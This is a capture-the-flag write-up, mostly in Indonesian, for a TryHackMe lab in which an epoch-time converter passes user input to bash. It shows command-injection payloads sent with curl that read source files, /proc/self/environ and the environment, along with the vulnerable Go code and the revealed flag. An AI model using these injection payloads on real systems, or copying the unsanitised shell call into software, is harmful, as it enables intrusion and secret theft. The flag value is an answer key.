Writeup Aria
challenges5_minute

Epoch

Be honest, you have always wanted an online tool that could help you convert UNIX dates and timestamps!

room

Desc

Be honest, you have always wanted an online tool that could help you convert UNIX dates and timestamps! Wait... it doesn't need to be online, you say? Are you telling me there is a command-line Linux program that can already do the same thing? Well, of course, we already knew that! Our website actually just passes your input right along to that command-line program!

Access this challenge by deploying both the vulnerable machine by pressing the green "Start Machine" button located within this task, and the TryHackMe AttackBox by pressing the "Start AttackBox" button located at the top-right of the page.

Navigate to the following URL using the AttackBox: http://MACHINE_IP

Check out similar content on TryHackMe:

solution

terdapat sebuah halaman convert epoch time.

1767721672520

saya coba iseng menambahkan karakter ; pada inputan epoch time. dan command id ternyata bisa di eksekusi.

1767721714200

namun ketika menjalankan perintah seperti

lalu saya coba ls, dan mencoba membaca file main.go

123123 ; cat main.go
package main

import (
	"fmt"
	"os/exec"

	"github.com/gofiber/fiber/v2"
	"github.com/gofiber/fiber/v2/middleware/logger"
	"github.com/gofiber/template/html"
)

func main() {
	// Initialize standard Go html template engine
	engine := html.New("./views", ".html")

	app := fiber.New(fiber.Config{
		Views: engine,
	})
	app.Use(logger.New())

	app.Get("/", func(c *fiber.Ctx) error {
		type Request struct {
			Epoch string `query:"epoch"`
		}
		r := new(Request)

		if err := c.QueryParser(r); err != nil {
			return c.SendStatus(fiber.StatusBadRequest)
		}

		if r.Epoch == "" {
			return c.Render("index", fiber.Map{
				"epoch":  r.Epoch,
				"output": "",
			})
		}

		cmdString := fmt.Sprintf("date -d @%s", r.Epoch)

		cmd := exec.Command("bash", "-c", cmdString)
		fmt.Printf("Running: %s", cmd)
		stdoutStderr, err := cmd.CombinedOutput()
		fmt.Printf("Result: %s", stdoutStderr)
		if err != nil {
			return c.Render("index", fiber.Map{
				"epoch":  r.Epoch,
				"output": err,
			})
		}
		return c.Render("index", fiber.Map{
			"epoch":  r.Epoch,
			"output": string(stdoutStderr),
		})
	})

	err := app.Listen(":3000")
	if err != nil {
		panic(err)
	}
}

; cat views/index.html

<!DOCTYPE html>

<head>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
        integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
    <style>
        body,
        html {
            height: 100%;
        }
    </style>
</head>

<body>
    <div class="container h-100">
        <div class="row mt-5">
            <div class="col-12 mb-4">
                <h3 class="text-center">Epoch to UTC convertor \u23f3</h3>
            </div>
            <form class="col-6 mx-auto" action="/">
                <div class=" input-group">
                    <input name="epoch" value="{{.epoch}}" type="text" class="form-control" placeholder="Epoch"
                        aria-label="Epoch" aria-describedby="basic-addon2" required>
                    <div class="input-group-append">
                        <button class="btn btn-outline-secondary" type="submit">Convert</button>
                    </div>
                </div>
            </form>
            <div class="col-9 mt-4 mx-auto">
                <pre>{{.output}}</pre>
            </div>
        </div>
    </div>
</body>

</html>

setelah di analisa ternyata aplikasi ini menggunakan bahasa pemrograman Go dan menjalankan perintah date -d @<input_epoch_time>. disini kita bisa memanfaatkan command injection dengan menambahkan karakter ; lalu diikuti perintah yang ingin kita jalankan. sekarang kita perlu mencari file yang berisi flag.

disini saya pindah ke curl agar lebih mudah

curl http://10.80.186.110/?epoch=%3B+id

lalu saya coba cari flag dimana mana namun tidak menemukanya, dan saya kepikiran mungkin saja di file /proc/self/environ, atau gunakan perintah env

curl "http://10.80.186.110/?epoch=%3B+cat /proc/self/environ"
# HOSTNAME=e7c1352e71ec\ufffdPWD=/home/challenge\ufffdHOME=/home/challenge\ufffdGOLANG_VERSION=1.15.7\ufffdFLAG=flag{7da6c7debd40bd611560c13d8149b647}\ufffdSHLVL=1\ufffdPATH=/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\ufffd_=/usr/bin/cat\ufffd</pre>

# bisa juga menggunakan env
curl "http://10.80.186.110/?epoch=%3B+env"
# HOSTNAME=e7c1352e71ec
# PWD=/home/challenge
# HOME=/home/challenge
# GOLANG_VERSION=1.15.7
# FLAG=flag{7da6c7debd40bd611560c13d8149b647}
# SHLVL=1
# PATH=/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# _=/usr/bin/env

1767722372640

flag

flag{7da6c7debd40bd611560c13d8149b647}

Corridor

Previous Page

Intermediate Nmap

Next Page

On this page

Descsolutionflag